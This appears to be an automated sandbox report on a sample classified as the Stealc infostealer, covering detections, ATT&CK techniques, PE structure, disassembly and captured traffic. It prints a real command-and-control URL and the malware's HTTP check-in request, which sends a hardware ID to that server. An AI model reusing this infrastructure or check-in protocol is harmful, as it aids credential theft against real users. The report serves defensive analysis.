                Source: Yara matchFile source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 1.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php5file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.3793file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpYGfile.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpWfile.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528316
                            Start date and time:2024-10-07 19:13:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 56s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 79%
                            • Number of executed functions: 18
                            • Number of non-executed functions: 85
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            NHvurkKE21.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            XDPT5mgIBO.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.103
                            c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.103
                            NHvurkKE21.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            XDPT5mgIBO.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.103

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.946222093655102
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'873'920 bytes
                            MD5:e65a390d1393c0f3cba1b5bfd5bff188
                            SHA1:bc716b7d8d95ffc9eb04dd36e63fc829dc51f3fa
                            SHA256:4911b53e223f5d5d5781b45599cad59b5b2e6d82e03bcd33c7d72f6df95f7488
                            SHA512:221753db8f7d91f911d946ff6be92ebe0705c5da8101a70c749f119b9ad2e3939194d24d51e05c4345020b85aeba313c72d9a2171cf81feea69760075a16df24
                            SSDEEP:24576:co8wAcnerEoBzaE9OHOGoxegW1DFnikBlCtWVhkgOGe+p1mmYADs2+f1mqT:cWn4HL9UObuXVwGeAmiDs2+f7
                            TLSH:FE8533068C9AC719EADD5DF0CFF8629EF4B46A9DE7D2EC61420D022F4829D125C8E635
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaac000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F6894C5DCDAh
                            pcmpeqd mm3, qword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F6894C5FCD5h
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800900dbf57d3a969b08d5ddf9027074fceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a90000x20019607b2bcb55d7aa1abe8561001e350eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            edqomgnb0x5070000x1a40000x1a3600536dbe5a5e9af512081b7c92c4a9ce5aFalse0.9947850689269747data7.953527628091509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            cxwgayag0x6ab0000x10000x400c2902be01ec2f5e4d96b5306c2e17da7False0.8212890625data6.275058777690843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6ac0000x30000x2200c93e0de29061c2a1915c1277964be241False0.05755974264705882DOS executable (COM)0.7634513999717485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-07T19:14:13.177285+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849706185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 7, 2024 19:14:12.165903091 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:12.170775890 CEST8049706185.215.113.37192.168.2.8
                            Oct 7, 2024 19:14:12.170861959 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:12.170984030 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:12.175935030 CEST8049706185.215.113.37192.168.2.8
                            Oct 7, 2024 19:14:12.933232069 CEST8049706185.215.113.37192.168.2.8
                            Oct 7, 2024 19:14:12.933336973 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:12.936276913 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:12.941181898 CEST8049706185.215.113.37192.168.2.8
                            Oct 7, 2024 19:14:13.177180052 CEST8049706185.215.113.37192.168.2.8
                            Oct 7, 2024 19:14:13.177284956 CEST4970680192.168.2.8185.215.113.37
                            Oct 7, 2024 19:14:15.881716013 CEST4970680192.168.2.8185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.849706185.215.113.37807828C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 7, 2024 19:14:12.170984030 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 7, 2024 19:14:12.933232069 CEST203INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 17:14:12 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 7, 2024 19:14:12.936276913 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 35 36 32 38 41 30 32 39 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a
                            Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"AE5628A0298F2963495975------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--
                            Oct 7, 2024 19:14:13.177180052 CEST210INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 17:14:13 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:1
                            Start time:13:14:06
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x850000
                            File size:1'873'920 bytes
                            MD5 hash:E65A390D1393C0F3CBA1B5BFD5BFF188
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:7.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.2%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:25
                              execution_graph 13528 8669f0 13573 852260 13528->13573 13552 866a64 13553 86a9b0 4 API calls 13552->13553 13554 866a6b 13553->13554 13555 86a9b0 4 API calls 13554->13555 13556 866a72 13555->13556 13557 86a9b0 4 API calls 13556->13557 13558 866a79 13557->13558 13559 86a9b0 4 API calls 13558->13559 13560 866a80 13559->13560 13725 86a8a0 13560->13725 13562 866b0c 13729 866920 GetSystemTime 13562->13729 13563 866a89 13563->13562 13566 866ac2 OpenEventA 13563->13566 13568 866af5 CloseHandle Sleep 13566->13568 13569 866ad9 13566->13569 13571 866b0a 13568->13571 13572 866ae1 CreateEventA 13569->13572 13571->13563 13572->13562 13926 8545c0 13573->13926 13575 852274 13576 8545c0 2 API calls 13575->13576 13577 85228d 13576->13577 13578 8545c0 2 API calls 13577->13578 13579 8522a6 13578->13579 13580 8545c0 2 API calls 13579->13580 13581 8522bf 13580->13581 13582 8545c0 2 API calls 13581->13582 13583 8522d8 13582->13583 13584 8545c0 2 API calls 13583->13584 13585 8522f1 13584->13585 13586 8545c0 2 API calls 13585->13586 13587 85230a 13586->13587 13588 8545c0 2 API calls 13587->13588 13589 852323 13588->13589 13590 8545c0 2 API calls 13589->13590 13591 85233c 13590->13591 13592 8545c0 2 API calls 13591->13592 13593 852355 13592->13593 13594 8545c0 2 API calls 13593->13594 13595 85236e 13594->13595 13596 8545c0 2 API calls 13595->13596 13597 852387 13596->13597 13598 8545c0 2 API calls 13597->13598 13599 8523a0 13598->13599 13600 8545c0 2 API calls 13599->13600 13601 8523b9 13600->13601 13602 8545c0 2 API calls 13601->13602 13603 8523d2 13602->13603 13604 8545c0 2 API calls 13603->13604 13605 8523eb 13604->13605 13606 8545c0 2 API calls 13605->13606 13607 852404 13606->13607 13608 8545c0 2 API calls 13607->13608 13609 85241d 13608->13609 13610 8545c0 2 API calls 13609->13610 13611 852436 13610->13611 13612 8545c0 2 API calls 13611->13612 13613 85244f 13612->13613 13614 8545c0 2 API calls 13613->13614 13615 852468 13614->13615 13616 8545c0 2 API calls 13615->13616 13617 852481 13616->13617 13618 8545c0 2 API calls 13617->13618 13619 85249a 13618->13619 13620 8545c0 2 API calls 13619->13620 13621 8524b3 13620->13621 13622 8545c0 2 API calls 13621->13622 13623 8524cc 13622->13623 13624 8545c0 2 API calls 13623->13624 13625 8524e5 13624->13625 13626 8545c0 2 API calls 13625->13626 13627 8524fe 13626->13627 13628 8545c0 2 API calls 13627->13628 13629 852517 13628->13629 13630 8545c0 2 API calls 13629->13630 13631 852530 13630->13631 13632 8545c0 2 API calls 13631->13632 13633 852549 13632->13633 13634 8545c0 2 API calls 13633->13634 13635 852562 13634->13635 13636 8545c0 2 API calls 13635->13636 13637 85257b 13636->13637 13638 8545c0 2 API calls 13637->13638 13639 852594 13638->13639 13640 8545c0 2 API calls 13639->13640 13641 8525ad 13640->13641 13642 8545c0 2 API calls 13641->13642 13643 8525c6 13642->13643 13644 8545c0 2 API calls 13643->13644 13645 8525df 13644->13645 13646 8545c0 2 API calls 13645->13646 13647 8525f8 13646->13647 13648 8545c0 2 API calls 13647->13648 13649 852611 13648->13649 13650 8545c0 2 API calls 13649->13650 13651 85262a 13650->13651 13652 8545c0 2 API calls 13651->13652 13653 852643 13652->13653 13654 8545c0 2 API calls 13653->13654 13655 85265c 13654->13655 13656 8545c0 2 API calls 13655->13656 13657 852675 13656->13657 13658 8545c0 2 API calls 13657->13658 13659 85268e 13658->13659 13660 869860 13659->13660 13931 869750 GetPEB 13660->13931 13662 869868 13663 869a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13662->13663 13664 86987a 13662->13664 13665 869af4 GetProcAddress 13663->13665 13666 869b0d 13663->13666 13669 86988c 21 API calls 13664->13669 13665->13666 13667 869b46 13666->13667 13668 869b16 GetProcAddress GetProcAddress 13666->13668 13670 869b4f GetProcAddress 13667->13670 13671 869b68 13667->13671 13668->13667 13669->13663 13670->13671 13672 869b71 GetProcAddress 13671->13672 13673 869b89 13671->13673 13672->13673 13674 869b92 GetProcAddress GetProcAddress 13673->13674 13675 866a00 13673->13675 13674->13675 13676 86a740 13675->13676 13677 86a750 13676->13677 13678 866a0d 13677->13678 13679 86a77e lstrcpy 13677->13679 13680 8511d0 13678->13680 13679->13678 13681 8511e8 13680->13681 13682 851217 13681->13682 13683 85120f ExitProcess 13681->13683 13684 851160 GetSystemInfo 13682->13684 13685 851184 13684->13685 13686 85117c ExitProcess 13684->13686 13687 851110 GetCurrentProcess VirtualAllocExNuma 13685->13687 13688 851141 ExitProcess 13687->13688 13689 851149 13687->13689 13932 8510a0 VirtualAlloc 13689->13932 13692 851220 13936 8689b0 13692->13936 13695 851249 __aulldiv 13696 85129a 13695->13696 13697 851292 ExitProcess 13695->13697 13698 866770 GetUserDefaultLangID 13696->13698 13699 866792 13698->13699 13700 8667d3 13698->13700 13699->13700 13701 8667b7 ExitProcess 13699->13701 13702 8667a3 ExitProcess 13699->13702 13703 8667c1 ExitProcess 13699->13703 13704 8667ad ExitProcess 13699->13704 13705 8667cb ExitProcess 13699->13705 13706 851190 13700->13706 13705->13700 13707 8678e0 3 API calls 13706->13707 13709 85119e 13707->13709 13708 8511cc 13713 867850 GetProcessHeap RtlAllocateHeap GetUserNameA 13708->13713 13709->13708 13710 867850 3 API calls 13709->13710 13711 8511b7 13710->13711 13711->13708 13712 8511c4 ExitProcess 13711->13712 13714 866a30 13713->13714 13715 8678e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13714->13715 13716 866a43 13715->13716 13717 86a9b0 13716->13717 13938 86a710 13717->13938 13719 86a9c1 lstrlen 13721 86a9e0 13719->13721 13720 86aa18 13939 86a7a0 13720->13939 13721->13720 13723 86a9fa lstrcpy lstrcat 13721->13723 13723->13720 13724 86aa24 13724->13552 13726 86a8bb 13725->13726 13727 86a90b 13726->13727 13728 86a8f9 lstrcpy 13726->13728 13727->13563 13728->13727 13943 866820 13729->13943 13731 86698e 13732 866998 sscanf 13731->13732 13972 86a800 13732->13972 13734 8669aa SystemTimeToFileTime SystemTimeToFileTime 13735 8669e0 13734->13735 13736 8669ce 13734->13736 13738 865b10 13735->13738 13736->13735 13737 8669d8 ExitProcess 